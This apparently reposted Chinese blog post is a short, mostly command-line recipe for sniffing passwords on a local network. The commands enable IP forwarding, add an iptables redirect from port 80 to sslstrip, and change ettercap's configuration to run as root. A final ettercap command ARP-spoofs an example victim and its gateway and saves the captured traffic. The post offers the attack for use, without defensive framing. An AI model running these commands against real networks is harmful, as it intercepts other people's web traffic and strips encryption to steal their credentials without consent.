利用SSLStrip & Ettercap ARP欺骗嗅探密码

apt-get purge ettercap
apt-get purge sslstrip
apt-get install ettercap
apt-get install sslstrip

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -l 8080


# from http://blog.csdn.net/ghosttzs

First you need to configure ettecap for sniffing a ssl connection. Open etter.confand edit the lines:
    
    [privs]
    ec_uid = 65534 # nobody is the default
    ec_gid = 65534 # nobody is the default


    to

    [privs]
    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default

    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"


    to this

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"


    Next information that you need is the victim ip and the gateway ip. Let's assume that the victim ip is 10.0.0.2 and the gateway is 10.0.0.1:

    ettercap -Tq -i eth0 -M arp:remote /10.0.0.2/ /10.0.0.1/  -w /root/Desktop/HiRoot/test.cap


转载请注明出处

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值